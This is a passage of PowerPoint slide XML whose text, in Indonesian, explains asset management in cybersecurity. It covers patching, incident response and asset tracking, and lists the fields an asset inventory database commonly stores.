              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditambal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperbarui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>respons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>insiden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengisolasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>insiden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengintegrasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperkuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>postur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berharga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pelacakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Aset</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melacak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>objek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>inventaris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengumpulan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset-aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>personel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bekerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencapai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rangkaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melacak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebanyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesedikit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, model, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nomor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
